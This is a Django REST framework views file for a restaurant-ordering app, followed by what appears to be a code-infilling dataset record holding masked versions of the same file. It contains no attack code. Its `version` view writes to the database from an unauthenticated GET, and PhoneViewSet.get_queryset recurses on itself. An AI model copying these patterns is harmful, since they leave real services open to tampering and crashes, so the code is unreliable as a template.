serializer = self.get_serializer(self._get_recommended_restaurants().order_by('-rates_avg'), many=True)
return Response(serializer.data)
@action(['get'], detail=True, url_path="restaurant-menus")
def get_restaurant_menus(self, request, *args, **kwargs):
categorized_menus = Menu.objects.grouped_by_meal_type_for_a_restaurant(restaurant_id=self.kwargs.get('pk'))
return Response(categorized_menus)
class MenuViewSet(ModelViewSet):
serializer_class = MenuSerializer
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
queryset = Menu.objects.all()
@action(['get'], detail=False, url_path="get-home")
def home(self, request, *args, **kwargs):
queryset = self.get_queryset()
special_offers = queryset.filter(~Q(discount=0)).order_by('?')[:5]
recommended = queryset.all().order_by('?')[:5]
special_offers = self.get_serializer(special_offers, many=True).data
recommended = self.get_serializer(recommended, many=True).data
response = {
'recommended': recommended,
'special_offers': special_offers
}
return Response(data=response)
@action(['get'], detail=False, url_path="special-offers")
def special_offers(self, request, *args, **kwargs):
queryset = self.get_queryset()
special_offers = queryset.filter(~Q(discount=0)).order_by('-created_at')
serializer = self.get_serializer(special_offers, many=True)
return Response(serializer.data)
@action(['get'], detail=False, url_path="recommended-offers")
def recommended_offers(self, request, *args, **kwargs):
queryset = self.get_queryset()
recommended = queryset.all().order_by('-created_at')
serializer = self.get_serializer(recommended, many=True)
return Response(serializer.data)
class OrderViewSet(ModelViewSet):
serializer_class = OrderWRestaurantSerializer
permission_classes = [permissions.IsAuthenticated]
queryset = Order.objects.all().order_by('-created_at')
def get_serializer(self, *args, **kwargs):
if self.action == "create":
return OrderSerializer(*args, **kwargs)
return super(OrderViewSet, self).get_serializer(*args, **kwargs)
def get_queryset(self):
return super(OrderViewSet, self).get_queryset().filter(client=self.request.user.client)
def create(self, request, *args, **kwargs):
fixer = RequestDataFixer(request=request)
return super(OrderViewSet, self).create(fixer, *args, **kwargs)
class OrderLineViewSet(ModelViewSet):
serializer_class = OrderLineSerializer
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
queryset = OrderLine.objects.all()
class WilayaViewSet(ModelViewSet):
serializer_class = WilayaSerializer
permission_classes = [my_perms.IsAdminOrReadOnly]
queryset = Wilaya.objects.all()
class CityViewSet(ModelViewSet):
serializer_class = CitySerializer
permission_classes = [my_perms.IsAdminOrReadOnly]
queryset = City.objects.all()
def version(request):
print('inside this')
if request.GET.get('code', None):
code = request.GET.get('code')
AppVersion.objects.all().update(code=code)
return JsonResponse({'updated': True})
else:
code = AppVersion.objects.all().first().code
return JsonResponse({'code': code})
class AddressViewSet(ModelViewSet):
serializer_class = AddressSerializer
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
queryset = Address.objects.all()
@action(['PUT'], detail=True, url_path="set-default", url_name='set-default')
def set_default(self, request, *args, **kwargs):
instance = self.get_object()
instance.default = True
instance.save()
self.get_queryset().filter(~Q(pk=instance.pk), belongs_to=request.user.client).update(default=False)
return Response(self.get_serializer(instance).data)
@action(['PUT'], detail=False, url_path="set-main", url_name='set-main')
def set_main(self, request, *args, **kwargs):
self.get_queryset().filter(belongs_to=request.user.client).update(default=False)
return Response({"status": True})
def get_queryset(self):
return super(AddressViewSet, self).get_queryset().filter(belongs_to=self.request.user.client)
class PhoneViewSet(ModelViewSet):
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
serializer_class = PhoneSerializer
queryset = Phone.objects.all()
@action(['PUT'], detail=False, url_path="set-main", url_name='set-main')
def set_main(self, request, *args, **kwargs):
self.get_queryset().filter(user=request.user).update(default=False)
return Response({"status": True})
@action(['PUT'], detail=True, url_path="set-default", url_name='set-default')
def set_default(self, request, *args, **kwargs):
instance = self.get_object()
instance.default = True
instance.save()
self.get_queryset().filter(~Q(pk=instance.pk), user=request.user).update(default=False)
return Response(self.get_serializer(instance).data)
def get_queryset(self):
return self.get_queryset().filter(user=self.request.user)
|
flexible
|
{
"blob_id": "9e8b5cebd48b3b98e421c896d9835ada5ec4166e",
"index": 2740,
"step-1": "<mask token>\n\n\nclass RestaurantViewSet(ModelViewSet):\n serializer_class = RestaurantSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = Restaurant.objects.all()\n\n def _get_recommended_restaurants(self) ->queryset:\n queryset = self.get_queryset()\n recommended = queryset.all().annotate(rates_avg=Avg('rates__stars'))\n return recommended\n\n def _get_special_restaurants(self) ->queryset:\n queryset = self.get_queryset()\n special_offers_restaurants = queryset.filter(Q(menus__discount__gt=\n 0) | Q(on_special_day=True))\n return special_offers_restaurants\n\n @action(['get'], detail=False, url_path='get-home')\n def home(self, request, *args, **kwargs):\n recommended = self._get_recommended_restaurants().order_by('?')[:5]\n special = self._get_special_restaurants().order_by('?')[:5]\n all_restaurants = self.get_queryset().order_by('?')[:5]\n recommended = self.get_serializer(recommended, many=True).data\n special = self.get_serializer(special, many=True).data\n all_restaurants = self.get_serializer(all_restaurants, many=True).data\n response = {'recommended': recommended, 'special': special, 'all':\n all_restaurants}\n return Response(response)\n\n @action(['get'], detail=False, url_path='special-offers')\n def special_offers(self, request, *args, **kwargs):\n serializer = self.get_serializer(self._get_special_restaurants().\n order_by('-created_at'), many=True)\n return Response(serializer.data)\n\n @action(['get'], detail=False, url_path='recommended-offers')\n def recommended_offers(self, request, *args, **kwargs):\n serializer = self.get_serializer(self._get_recommended_restaurants(\n ).order_by('-rates_avg'), many=True)\n return Response(serializer.data)\n\n @action(['get'], detail=True, url_path='restaurant-menus')\n def get_restaurant_menus(self, request, *args, **kwargs):\n categorized_menus = Menu.objects.grouped_by_meal_type_for_a_restaurant(\n restaurant_id=self.kwargs.get('pk'))\n return Response(categorized_menus)\n\n\nclass MenuViewSet(ModelViewSet):\n serializer_class = MenuSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = Menu.objects.all()\n\n @action(['get'], detail=False, url_path='get-home')\n def home(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n special_offers = queryset.filter(~Q(discount=0)).order_by('?')[:5]\n recommended = queryset.all().order_by('?')[:5]\n special_offers = self.get_serializer(special_offers, many=True).data\n recommended = self.get_serializer(recommended, many=True).data\n response = {'recommended': recommended, 'special_offers':\n special_offers}\n return Response(data=response)\n\n @action(['get'], detail=False, url_path='special-offers')\n def special_offers(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n special_offers = queryset.filter(~Q(discount=0)).order_by('-created_at'\n )\n serializer = self.get_serializer(special_offers, many=True)\n return Response(serializer.data)\n\n @action(['get'], detail=False, url_path='recommended-offers')\n def recommended_offers(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n recommended = queryset.all().order_by('-created_at')\n serializer = self.get_serializer(recommended, many=True)\n return Response(serializer.data)\n\n\nclass OrderViewSet(ModelViewSet):\n serializer_class = OrderWRestaurantSerializer\n permission_classes = [permissions.IsAuthenticated]\n queryset = Order.objects.all().order_by('-created_at')\n\n def get_serializer(self, *args, **kwargs):\n if self.action == 'create':\n return OrderSerializer(*args, **kwargs)\n return super(OrderViewSet, self).get_serializer(*args, **kwargs)\n\n def get_queryset(self):\n return super(OrderViewSet, self).get_queryset().filter(client=self.\n request.user.client)\n\n def create(self, request, *args, **kwargs):\n fixer = RequestDataFixer(request=request)\n return super(OrderViewSet, self).create(fixer, *args, **kwargs)\n\n\nclass OrderLineViewSet(ModelViewSet):\n serializer_class = OrderLineSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = OrderLine.objects.all()\n\n\nclass WilayaViewSet(ModelViewSet):\n serializer_class = WilayaSerializer\n permission_classes = [my_perms.IsAdminOrReadOnly]\n queryset = Wilaya.objects.all()\n\n\nclass CityViewSet(ModelViewSet):\n serializer_class = CitySerializer\n permission_classes = [my_perms.IsAdminOrReadOnly]\n queryset = City.objects.all()\n\n\n<mask token>\n\n\nclass AddressViewSet(ModelViewSet):\n serializer_class = AddressSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = Address.objects.all()\n\n @action(['PUT'], detail=True, url_path='set-default', url_name=\n 'set-default')\n def set_default(self, request, *args, **kwargs):\n instance = self.get_object()\n instance.default = True\n instance.save()\n self.get_queryset().filter(~Q(pk=instance.pk), belongs_to=request.\n user.client).update(default=False)\n return Response(self.get_serializer(instance).data)\n\n @action(['PUT'], detail=False, url_path='set-main', url_name='set-main')\n def set_main(self, request, *args, **kwargs):\n self.get_queryset().filter(belongs_to=request.user.client).update(\n default=False)\n return Response({'status': True})\n\n def get_queryset(self):\n return super(AddressViewSet, self).get_queryset().filter(belongs_to\n =self.request.user.client)\n\n\nclass PhoneViewSet(ModelViewSet):\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n serializer_class = PhoneSerializer\n queryset = Phone.objects.all()\n\n @action(['PUT'], detail=False, url_path='set-main', url_name='set-main')\n def set_main(self, request, *args, **kwargs):\n self.get_queryset().filter(user=request.user).update(default=False)\n return Response({'status': True})\n\n @action(['PUT'], detail=True, url_path='set-default', url_name=\n 'set-default')\n def set_default(self, request, *args, **kwargs):\n instance = self.get_object()\n instance.default = True\n instance.save()\n self.get_queryset().filter(~Q(pk=instance.pk), user=request.user\n ).update(default=False)\n return Response(self.get_serializer(instance).data)\n\n def get_queryset(self):\n return self.get_queryset().filter(user=self.request.user)\n",
"step-2": "<mask token>\n\n\nclass MealTypeViewSet(ModelViewSet):\n permission_classes = [my_perms.IsAdminOrReadOnly]\n serializer_class = MealTypeSerializer\n queryset = MealType.objects.all()\n\n def get_serializer(self, *args, **kwargs):\n if self.action == 'get_types_with_menus':\n serializer_class = MealTypesWithMenuSerializer\n kwargs['context'] = self.get_serializer_context()\n return serializer_class(*args, **kwargs)\n return super(MealTypeViewSet, self).get_serializer(*args, **kwargs)\n\n @action(['get'], detail=False, url_path='type-with-menus')\n def get_types_with_menus(self, request, *args, **kwargs):\n types = self.get_queryset().filter(menus__offered_by=request.\n query_params.get('restaurant', 0))\n types = self.get_serializer(types, many=True).data\n return Response(types)\n\n\nclass RestaurantTypeViewSet(ModelViewSet):\n serializer_class = RestaurantTypeSerializer\n permission_classes = [my_perms.IsAdminOrReadOnly]\n queryset = RestaurantType.objects.all()\n\n\nclass RestaurantViewSet(ModelViewSet):\n serializer_class = RestaurantSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = Restaurant.objects.all()\n\n def _get_recommended_restaurants(self) ->queryset:\n queryset = self.get_queryset()\n recommended = queryset.all().annotate(rates_avg=Avg('rates__stars'))\n return recommended\n\n def _get_special_restaurants(self) ->queryset:\n queryset = self.get_queryset()\n special_offers_restaurants = queryset.filter(Q(menus__discount__gt=\n 0) | Q(on_special_day=True))\n return special_offers_restaurants\n\n @action(['get'], detail=False, url_path='get-home')\n def home(self, request, *args, **kwargs):\n recommended = self._get_recommended_restaurants().order_by('?')[:5]\n special = self._get_special_restaurants().order_by('?')[:5]\n all_restaurants = self.get_queryset().order_by('?')[:5]\n recommended = self.get_serializer(recommended, many=True).data\n special = self.get_serializer(special, many=True).data\n all_restaurants = self.get_serializer(all_restaurants, many=True).data\n response = {'recommended': recommended, 'special': special, 'all':\n all_restaurants}\n return Response(response)\n\n @action(['get'], detail=False, url_path='special-offers')\n def special_offers(self, request, *args, **kwargs):\n serializer = self.get_serializer(self._get_special_restaurants().\n order_by('-created_at'), many=True)\n return Response(serializer.data)\n\n @action(['get'], detail=False, url_path='recommended-offers')\n def recommended_offers(self, request, *args, **kwargs):\n serializer = self.get_serializer(self._get_recommended_restaurants(\n ).order_by('-rates_avg'), many=True)\n return Response(serializer.data)\n\n @action(['get'], detail=True, url_path='restaurant-menus')\n def get_restaurant_menus(self, request, *args, **kwargs):\n categorized_menus = Menu.objects.grouped_by_meal_type_for_a_restaurant(\n restaurant_id=self.kwargs.get('pk'))\n return Response(categorized_menus)\n\n\nclass MenuViewSet(ModelViewSet):\n serializer_class = MenuSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = Menu.objects.all()\n\n @action(['get'], detail=False, url_path='get-home')\n def home(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n special_offers = queryset.filter(~Q(discount=0)).order_by('?')[:5]\n recommended = queryset.all().order_by('?')[:5]\n special_offers = self.get_serializer(special_offers, many=True).data\n recommended = self.get_serializer(recommended, many=True).data\n response = {'recommended': recommended, 'special_offers':\n special_offers}\n return Response(data=response)\n\n @action(['get'], detail=False, url_path='special-offers')\n def special_offers(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n special_offers = queryset.filter(~Q(discount=0)).order_by('-created_at'\n )\n serializer = self.get_serializer(special_offers, many=True)\n return Response(serializer.data)\n\n @action(['get'], detail=False, url_path='recommended-offers')\n def recommended_offers(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n recommended = queryset.all().order_by('-created_at')\n serializer = self.get_serializer(recommended, many=True)\n return Response(serializer.data)\n\n\nclass OrderViewSet(ModelViewSet):\n serializer_class = OrderWRestaurantSerializer\n permission_classes = [permissions.IsAuthenticated]\n queryset = Order.objects.all().order_by('-created_at')\n\n def get_serializer(self, *args, **kwargs):\n if self.action == 'create':\n return OrderSerializer(*args, **kwargs)\n return super(OrderViewSet, self).get_serializer(*args, **kwargs)\n\n def get_queryset(self):\n return super(OrderViewSet, self).get_queryset().filter(client=self.\n request.user.client)\n\n def create(self, request, *args, **kwargs):\n fixer = RequestDataFixer(request=request)\n return super(OrderViewSet, self).create(fixer, *args, **kwargs)\n\n\nclass OrderLineViewSet(ModelViewSet):\n serializer_class = OrderLineSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = OrderLine.objects.all()\n\n\nclass WilayaViewSet(ModelViewSet):\n serializer_class = WilayaSerializer\n permission_classes = [my_perms.IsAdminOrReadOnly]\n queryset = Wilaya.objects.all()\n\n\nclass CityViewSet(ModelViewSet):\n serializer_class = CitySerializer\n permission_classes = [my_perms.IsAdminOrReadOnly]\n queryset = City.objects.all()\n\n\n<mask token>\n\n\nclass AddressViewSet(ModelViewSet):\n serializer_class = AddressSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = Address.objects.all()\n\n @action(['PUT'], detail=True, url_path='set-default', url_name=\n 'set-default')\n def set_default(self, request, *args, **kwargs):\n instance = self.get_object()\n instance.default = True\n instance.save()\n self.get_queryset().filter(~Q(pk=instance.pk), belongs_to=request.\n user.client).update(default=False)\n return Response(self.get_serializer(instance).data)\n\n @action(['PUT'], detail=False, url_path='set-main', url_name='set-main')\n def set_main(self, request, *args, **kwargs):\n self.get_queryset().filter(belongs_to=request.user.client).update(\n default=False)\n return Response({'status': True})\n\n def get_queryset(self):\n return super(AddressViewSet, self).get_queryset().filter(belongs_to\n =self.request.user.client)\n\n\nclass PhoneViewSet(ModelViewSet):\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n serializer_class = PhoneSerializer\n queryset = Phone.objects.all()\n\n @action(['PUT'], detail=False, url_path='set-main', url_name='set-main')\n def set_main(self, request, *args, **kwargs):\n self.get_queryset().filter(user=request.user).update(default=False)\n return Response({'status': True})\n\n @action(['PUT'], detail=True, url_path='set-default', url_name=\n 'set-default')\n def set_default(self, request, *args, **kwargs):\n instance = self.get_object()\n instance.default = True\n instance.save()\n self.get_queryset().filter(~Q(pk=instance.pk), user=request.user\n ).update(default=False)\n return Response(self.get_serializer(instance).data)\n\n def get_queryset(self):\n return self.get_queryset().filter(user=self.request.user)\n",
"step-3": "<mask token>\n\n\nclass CuisineViewSet(ModelViewSet):\n <mask token>\n <mask token>\n <mask token>\n\n\nclass MealTypeViewSet(ModelViewSet):\n permission_classes = [my_perms.IsAdminOrReadOnly]\n serializer_class = MealTypeSerializer\n queryset = MealType.objects.all()\n\n def get_serializer(self, *args, **kwargs):\n if self.action == 'get_types_with_menus':\n serializer_class = MealTypesWithMenuSerializer\n kwargs['context'] = self.get_serializer_context()\n return serializer_class(*args, **kwargs)\n return super(MealTypeViewSet, self).get_serializer(*args, **kwargs)\n\n @action(['get'], detail=False, url_path='type-with-menus')\n def get_types_with_menus(self, request, *args, **kwargs):\n types = self.get_queryset().filter(menus__offered_by=request.\n query_params.get('restaurant', 0))\n types = self.get_serializer(types, many=True).data\n return Response(types)\n\n\nclass RestaurantTypeViewSet(ModelViewSet):\n serializer_class = RestaurantTypeSerializer\n permission_classes = [my_perms.IsAdminOrReadOnly]\n queryset = RestaurantType.objects.all()\n\n\nclass RestaurantViewSet(ModelViewSet):\n serializer_class = RestaurantSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = Restaurant.objects.all()\n\n def _get_recommended_restaurants(self) ->queryset:\n queryset = self.get_queryset()\n recommended = queryset.all().annotate(rates_avg=Avg('rates__stars'))\n return recommended\n\n def _get_special_restaurants(self) ->queryset:\n queryset = self.get_queryset()\n special_offers_restaurants = queryset.filter(Q(menus__discount__gt=\n 0) | Q(on_special_day=True))\n return special_offers_restaurants\n\n @action(['get'], detail=False, url_path='get-home')\n def home(self, request, *args, **kwargs):\n recommended = self._get_recommended_restaurants().order_by('?')[:5]\n special = self._get_special_restaurants().order_by('?')[:5]\n all_restaurants = self.get_queryset().order_by('?')[:5]\n recommended = self.get_serializer(recommended, many=True).data\n special = self.get_serializer(special, many=True).data\n all_restaurants = self.get_serializer(all_restaurants, many=True).data\n response = {'recommended': recommended, 'special': special, 'all':\n all_restaurants}\n return Response(response)\n\n @action(['get'], detail=False, url_path='special-offers')\n def special_offers(self, request, *args, **kwargs):\n serializer = self.get_serializer(self._get_special_restaurants().\n order_by('-created_at'), many=True)\n return Response(serializer.data)\n\n @action(['get'], detail=False, url_path='recommended-offers')\n def recommended_offers(self, request, *args, **kwargs):\n serializer = self.get_serializer(self._get_recommended_restaurants(\n ).order_by('-rates_avg'), many=True)\n return Response(serializer.data)\n\n @action(['get'], detail=True, url_path='restaurant-menus')\n def get_restaurant_menus(self, request, *args, **kwargs):\n categorized_menus = Menu.objects.grouped_by_meal_type_for_a_restaurant(\n restaurant_id=self.kwargs.get('pk'))\n return Response(categorized_menus)\n\n\nclass MenuViewSet(ModelViewSet):\n serializer_class = MenuSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = Menu.objects.all()\n\n @action(['get'], detail=False, url_path='get-home')\n def home(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n special_offers = queryset.filter(~Q(discount=0)).order_by('?')[:5]\n recommended = queryset.all().order_by('?')[:5]\n special_offers = self.get_serializer(special_offers, many=True).data\n recommended = self.get_serializer(recommended, many=True).data\n response = {'recommended': recommended, 'special_offers':\n special_offers}\n return Response(data=response)\n\n @action(['get'], detail=False, url_path='special-offers')\n def special_offers(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n special_offers = queryset.filter(~Q(discount=0)).order_by('-created_at'\n )\n serializer = self.get_serializer(special_offers, many=True)\n return Response(serializer.data)\n\n @action(['get'], detail=False, url_path='recommended-offers')\n def recommended_offers(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n recommended = queryset.all().order_by('-created_at')\n serializer = self.get_serializer(recommended, many=True)\n return Response(serializer.data)\n\n\nclass OrderViewSet(ModelViewSet):\n serializer_class = OrderWRestaurantSerializer\n permission_classes = [permissions.IsAuthenticated]\n queryset = Order.objects.all().order_by('-created_at')\n\n def get_serializer(self, *args, **kwargs):\n if self.action == 'create':\n return OrderSerializer(*args, **kwargs)\n return super(OrderViewSet, self).get_serializer(*args, **kwargs)\n\n def get_queryset(self):\n return super(OrderViewSet, self).get_queryset().filter(client=self.\n request.user.client)\n\n def create(self, request, *args, **kwargs):\n fixer = RequestDataFixer(request=request)\n return super(OrderViewSet, self).create(fixer, *args, **kwargs)\n\n\nclass OrderLineViewSet(ModelViewSet):\n serializer_class = OrderLineSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = OrderLine.objects.all()\n\n\nclass WilayaViewSet(ModelViewSet):\n serializer_class = WilayaSerializer\n permission_classes = [my_perms.IsAdminOrReadOnly]\n queryset = Wilaya.objects.all()\n\n\nclass CityViewSet(ModelViewSet):\n serializer_class = CitySerializer\n permission_classes = [my_perms.IsAdminOrReadOnly]\n queryset = City.objects.all()\n\n\n<mask token>\n\n\nclass AddressViewSet(ModelViewSet):\n serializer_class = AddressSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = Address.objects.all()\n\n @action(['PUT'], detail=True, url_path='set-default', url_name=\n 'set-default')\n def set_default(self, request, *args, **kwargs):\n instance = self.get_object()\n instance.default = True\n instance.save()\n self.get_queryset().filter(~Q(pk=instance.pk), belongs_to=request.\n user.client).update(default=False)\n return Response(self.get_serializer(instance).data)\n\n @action(['PUT'], detail=False, url_path='set-main', url_name='set-main')\n def set_main(self, request, *args, **kwargs):\n self.get_queryset().filter(belongs_to=request.user.client).update(\n default=False)\n return Response({'status': True})\n\n def get_queryset(self):\n return super(AddressViewSet, self).get_queryset().filter(belongs_to\n =self.request.user.client)\n\n\nclass PhoneViewSet(ModelViewSet):\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n serializer_class = PhoneSerializer\n queryset = Phone.objects.all()\n\n @action(['PUT'], detail=False, url_path='set-main', url_name='set-main')\n def set_main(self, request, *args, **kwargs):\n self.get_queryset().filter(user=request.user).update(default=False)\n return Response({'status': True})\n\n @action(['PUT'], detail=True, url_path='set-default', url_name=\n 'set-default')\n def set_default(self, request, *args, **kwargs):\n instance = self.get_object()\n instance.default = True\n instance.save()\n self.get_queryset().filter(~Q(pk=instance.pk), user=request.user\n ).update(default=False)\n return Response(self.get_serializer(instance).data)\n\n def get_queryset(self):\n return self.get_queryset().filter(user=self.request.user)\n",
"step-4": "<mask token>\n\n\nclass CuisineViewSet(ModelViewSet):\n serializer_class = CuisineSerializer\n permission_classes = [my_perms.IsAdminOrReadOnly]\n queryset = Cuisine.objects.all()\n\n\nclass MealTypeViewSet(ModelViewSet):\n permission_classes = [my_perms.IsAdminOrReadOnly]\n serializer_class = MealTypeSerializer\n queryset = MealType.objects.all()\n\n def get_serializer(self, *args, **kwargs):\n if self.action == 'get_types_with_menus':\n serializer_class = MealTypesWithMenuSerializer\n kwargs['context'] = self.get_serializer_context()\n return serializer_class(*args, **kwargs)\n return super(MealTypeViewSet, self).get_serializer(*args, **kwargs)\n\n @action(['get'], detail=False, url_path='type-with-menus')\n def get_types_with_menus(self, request, *args, **kwargs):\n types = self.get_queryset().filter(menus__offered_by=request.\n query_params.get('restaurant', 0))\n types = self.get_serializer(types, many=True).data\n return Response(types)\n\n\nclass RestaurantTypeViewSet(ModelViewSet):\n serializer_class = RestaurantTypeSerializer\n permission_classes = [my_perms.IsAdminOrReadOnly]\n queryset = RestaurantType.objects.all()\n\n\nclass RestaurantViewSet(ModelViewSet):\n serializer_class = RestaurantSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = Restaurant.objects.all()\n\n def _get_recommended_restaurants(self) ->queryset:\n queryset = self.get_queryset()\n recommended = queryset.all().annotate(rates_avg=Avg('rates__stars'))\n return recommended\n\n def _get_special_restaurants(self) ->queryset:\n queryset = self.get_queryset()\n special_offers_restaurants = queryset.filter(Q(menus__discount__gt=\n 0) | Q(on_special_day=True))\n return special_offers_restaurants\n\n @action(['get'], detail=False, url_path='get-home')\n def home(self, request, *args, **kwargs):\n recommended = self._get_recommended_restaurants().order_by('?')[:5]\n special = self._get_special_restaurants().order_by('?')[:5]\n all_restaurants = self.get_queryset().order_by('?')[:5]\n recommended = self.get_serializer(recommended, many=True).data\n special = self.get_serializer(special, many=True).data\n all_restaurants = self.get_serializer(all_restaurants, many=True).data\n response = {'recommended': recommended, 'special': special, 'all':\n all_restaurants}\n return Response(response)\n\n @action(['get'], detail=False, url_path='special-offers')\n def special_offers(self, request, *args, **kwargs):\n serializer = self.get_serializer(self._get_special_restaurants().\n order_by('-created_at'), many=True)\n return Response(serializer.data)\n\n @action(['get'], detail=False, url_path='recommended-offers')\n def recommended_offers(self, request, *args, **kwargs):\n serializer = self.get_serializer(self._get_recommended_restaurants(\n ).order_by('-rates_avg'), many=True)\n return Response(serializer.data)\n\n @action(['get'], detail=True, url_path='restaurant-menus')\n def get_restaurant_menus(self, request, *args, **kwargs):\n categorized_menus = Menu.objects.grouped_by_meal_type_for_a_restaurant(\n restaurant_id=self.kwargs.get('pk'))\n return Response(categorized_menus)\n\n\nclass MenuViewSet(ModelViewSet):\n serializer_class = MenuSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = Menu.objects.all()\n\n @action(['get'], detail=False, url_path='get-home')\n def home(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n special_offers = queryset.filter(~Q(discount=0)).order_by('?')[:5]\n recommended = queryset.all().order_by('?')[:5]\n special_offers = self.get_serializer(special_offers, many=True).data\n recommended = self.get_serializer(recommended, many=True).data\n response = {'recommended': recommended, 'special_offers':\n special_offers}\n return Response(data=response)\n\n @action(['get'], detail=False, url_path='special-offers')\n def special_offers(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n special_offers = queryset.filter(~Q(discount=0)).order_by('-created_at'\n )\n serializer = self.get_serializer(special_offers, many=True)\n return Response(serializer.data)\n\n @action(['get'], detail=False, url_path='recommended-offers')\n def recommended_offers(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n recommended = queryset.all().order_by('-created_at')\n serializer = self.get_serializer(recommended, many=True)\n return Response(serializer.data)\n\n\nclass OrderViewSet(ModelViewSet):\n serializer_class = OrderWRestaurantSerializer\n permission_classes = [permissions.IsAuthenticated]\n queryset = Order.objects.all().order_by('-created_at')\n\n def get_serializer(self, *args, **kwargs):\n if self.action == 'create':\n return OrderSerializer(*args, **kwargs)\n return super(OrderViewSet, self).get_serializer(*args, **kwargs)\n\n def get_queryset(self):\n return super(OrderViewSet, self).get_queryset().filter(client=self.\n request.user.client)\n\n def create(self, request, *args, **kwargs):\n fixer = RequestDataFixer(request=request)\n return super(OrderViewSet, self).create(fixer, *args, **kwargs)\n\n\nclass OrderLineViewSet(ModelViewSet):\n serializer_class = OrderLineSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = OrderLine.objects.all()\n\n\nclass WilayaViewSet(ModelViewSet):\n serializer_class = WilayaSerializer\n permission_classes = [my_perms.IsAdminOrReadOnly]\n queryset = Wilaya.objects.all()\n\n\nclass CityViewSet(ModelViewSet):\n serializer_class = CitySerializer\n permission_classes = [my_perms.IsAdminOrReadOnly]\n queryset = City.objects.all()\n\n\n<mask token>\n\n\nclass AddressViewSet(ModelViewSet):\n serializer_class = AddressSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = Address.objects.all()\n\n @action(['PUT'], detail=True, url_path='set-default', url_name=\n 'set-default')\n def set_default(self, request, *args, **kwargs):\n instance = self.get_object()\n instance.default = True\n instance.save()\n self.get_queryset().filter(~Q(pk=instance.pk), belongs_to=request.\n user.client).update(default=False)\n return Response(self.get_serializer(instance).data)\n\n @action(['PUT'], detail=False, url_path='set-main', url_name='set-main')\n def set_main(self, request, *args, **kwargs):\n self.get_queryset().filter(belongs_to=request.user.client).update(\n default=False)\n return Response({'status': True})\n\n def get_queryset(self):\n return super(AddressViewSet, self).get_queryset().filter(belongs_to\n =self.request.user.client)\n\n\nclass PhoneViewSet(ModelViewSet):\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n serializer_class = PhoneSerializer\n queryset = Phone.objects.all()\n\n @action(['PUT'], detail=False, url_path='set-main', url_name='set-main')\n def set_main(self, request, *args, **kwargs):\n self.get_queryset().filter(user=request.user).update(default=False)\n return Response({'status': True})\n\n @action(['PUT'], detail=True, url_path='set-default', url_name=\n 'set-default')\n def set_default(self, request, *args, **kwargs):\n instance = self.get_object()\n instance.default = True\n instance.save()\n self.get_queryset().filter(~Q(pk=instance.pk), user=request.user\n ).update(default=False)\n return Response(self.get_serializer(instance).data)\n\n def get_queryset(self):\n return self.get_queryset().filter(user=self.request.user)\n",
"step-5": "from django.db.models import Q, Avg\nfrom django.http import JsonResponse\nfrom rest_framework import permissions\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.authtoken.views import ObtainAuthToken\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework.viewsets import ModelViewSet\n\nfrom base_backend import permissions as my_perms\nfrom base_backend.utils import RequestDataFixer\nfrom restaurants.models import User, Cuisine, MealType, AppVersion, RestaurantType, Restaurant, Menu, Order, OrderLine, \\\n Wilaya, City, Address, Phone\nfrom restaurants.serializers import UserSerializer, SmsConfirmationSerializer, CuisineSerializer, \\\n RestaurantTypeSerializer, RestaurantSerializer, MenuSerializer, OrderLineSerializer, WilayaSerializer, \\\n CitySerializer, OrderWRestaurantSerializer, MealTypesWithMenuSerializer, MealTypeSerializer, OrderSerializer, \\\n AddressSerializer, PhoneSerializer\n\n\nclass LoginApi(ObtainAuthToken):\n def post(self, request, *args, **kwargs):\n serializer = self.serializer_class(data=request.data,\n context=dict(request=request))\n serializer.is_valid(raise_exception=True)\n user = serializer.validated_data['user']\n token, created = Token.objects.get_or_create(user=user)\n\n return Response(\n dict(\n token=token.key,\n user_id=user.pk,\n phone=user.phone,\n email=user.email,\n type=user.user_type,\n photo=user.photo.url if user.photo else None,\n address=user.address,\n city=user.lives_in_id,\n birth_date=user.birth_date,\n username=user.username,\n # is_participant=user.client.is_participant if user.client is not None else None,\n # participant_id=user.client.participant.participant_id if user.client else None,\n )\n )\n\n\nclass UserViewSet(ModelViewSet):\n serializer_class = UserSerializer\n queryset = User.objects.filter(is_active=True)\n\n def get_permissions(self):\n if self.action == 'create' or self.action == 'register':\n return [permissions.AllowAny()]\n else:\n return [permissions.IsAuthenticatedOrReadOnly()]\n\n 